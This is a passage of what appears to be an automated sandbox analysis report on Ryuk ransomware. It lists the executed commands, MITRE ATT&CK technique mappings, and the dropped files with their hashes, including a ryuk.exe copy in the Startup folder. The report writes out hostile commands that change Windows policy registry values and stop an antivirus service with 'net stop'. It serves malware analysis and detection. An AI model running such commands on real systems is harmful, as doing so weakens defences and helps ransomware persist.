    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
    3⤵
    PID:1688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
  2⤵
  PID:228
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
    3⤵
    PID:664

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
1⤵
PID:1628

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Indicator Removal on Host

T1070

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RYUKID

Filesize
8B

MD5
aff52676600e01a9b4dd3be3903422a1

SHA1
50d10a0c117d7a542ac39e6d58436877cd679bf3

SHA256
22c3addd2a6fd6d0ee88e38557d7ea3704040d680070a17a2415df749d934cd4

SHA512
9e799e060346aaf213227a65ef697b6517a6de45fdf441f35e4e63befe64548f24cb9b94003b4b54890e6fe542dd0ce72977ebb2237265079029b4ba2540f926

Download Submit
C:\ProgramData\RyukReadMe.txt

Filesize
1KB

MD5
d0484f1f0cdbb1714d57c85d6fde31af

SHA1
93bcd85444aa945d111a6d2c8c8114ff35d84355

SHA256
df35aa15068517fc7fe657442f0cad225c55cfe1273167f3f7647ada7d8a5e2a

SHA512
21003cd6122f9725792d0235e6b71ff4740f308a5770912aeb6825b42a0b332f275679d32117c88967f87d296ca52632d43f78ca1b4c90d05c3480abf7e2026c

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
26d94de237b491108832155c77d77ae1

SHA1
dde07543a773f503bb47d5c7b77cc73afbd28f60

SHA256
36ad6ee4e0305404ac738130f52020364fefc0428f4fe95e1d760b3b1c8eea6c

SHA512
f4b4783a6c8cae739e7855505400de53cce7863fd4c1728dac379e449b3953a0cd934e977e814c1b68eed6b8fb36986a2dd291b66413390717a2b2f635de612a

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
26d94de237b491108832155c77d77ae1

SHA1
dde07543a773f503bb47d5c7b77cc73afbd28f60

SHA256
36ad6ee4e0305404ac738130f52020364fefc0428f4fe95e1d760b3b1c8eea6c

SHA512
f4b4783a6c8cae739e7855505400de53cce7863fd4c1728dac379e449b3953a0cd934e977e814c1b68eed6b8fb36986a2dd291b66413390717a2b2f635de612a

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
5cd269efc0e51d8f6f5883fa71ae9414

SHA1
f7dd1b39b2fa39667dbad5f75f2ea02d3af0195b

SHA256
b20af979c7ee6b1006c3e415125a6749be280af5f05eb2d6a8f99ca6cbda127d

SHA512
e24f2dcf0a7136b49a005c133d5598f470cdf1df1fdec00753857caf18e429b90c7e94351ebe6ba57ddf8b7c11ec2dc27e46022285d6c68d551d2fb3376f9463

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
5cd269efc0e51d8f6f5883fa71ae9414

SHA1
f7dd1b39b2fa39667dbad5f75f2ea02d3af0195b

SHA256
b20af979c7ee6b1006c3e415125a6749be280af5f05eb2d6a8f99ca6cbda127d

SHA512
e24f2dcf0a7136b49a005c133d5598f470cdf1df1fdec00753857caf18e429b90c7e94351ebe6ba57ddf8b7c11ec2dc27e46022285d6c68d551d2fb3376f9463

Download Submit
C:\ProgramData\ryuk.exe

Filesize
885KB

MD5
154b73d0a7aa19df12364a78b235f29f

SHA1
5e39ad8cd8f05d29b7587a876c318be5c0511dcc

SHA256
f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea

SHA512
bf32fb8e846170bb5f2c9505e5577e5d3b31f3f9a43030b5f3268d66f3d11f3c983b231742f0d51488c4a288639c0d9e91a911fec0b016d54047e582695a98e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID

Filesize
8B

MD5
aff52676600e01a9b4dd3be3903422a1

SHA1
50d10a0c117d7a542ac39e6d58436877cd679bf3

SHA256
22c3addd2a6fd6d0ee88e38557d7ea3704040d680070a17a2415df749d934cd4

SHA512
9e799e060346aaf213227a65ef697b6517a6de45fdf441f35e4e63befe64548f24cb9b94003b4b54890e6fe542dd0ce72977ebb2237265079029b4ba2540f926

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1

Filesize
2KB

MD5
26d94de237b491108832155c77d77ae1

SHA1
dde07543a773f503bb47d5c7b77cc73afbd28f60

SHA256
36ad6ee4e0305404ac738130f52020364fefc0428f4fe95e1d760b3b1c8eea6c

SHA512
f4b4783a6c8cae739e7855505400de53cce7863fd4c1728dac379e449b3953a0cd934e977e814c1b68eed6b8fb36986a2dd291b66413390717a2b2f635de612a

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2

Filesize
292B

MD5
5cd269efc0e51d8f6f5883fa71ae9414

SHA1
f7dd1b39b2fa39667dbad5f75f2ea02d3af0195b

SHA256
b20af979c7ee6b1006c3e415125a6749be280af5f05eb2d6a8f99ca6cbda127d

SHA512
e24f2dcf0a7136b49a005c133d5598f470cdf1df1fdec00753857caf18e429b90c7e94351ebe6ba57ddf8b7c11ec2dc27e46022285d6c68d551d2fb3376f9463

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

Filesize
885KB

MD5
154b73d0a7aa19df12364a78b235f29f

SHA1
5e39ad8cd8f05d29b7587a876c318be5c0511dcc

SHA256
f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea

SHA512
bf32fb8e846170bb5f2c9505e5577e5d3b31f3f9a43030b5f3268d66f3d11f3c983b231742f0d51488c4a288639c0d9e91a911fec0b016d54047e582695a98e0

Download Submit
memory/1192-103-0x000007FEFC391000-0x000007FEFC393000-memory.dmp

Filesize
8KB

Download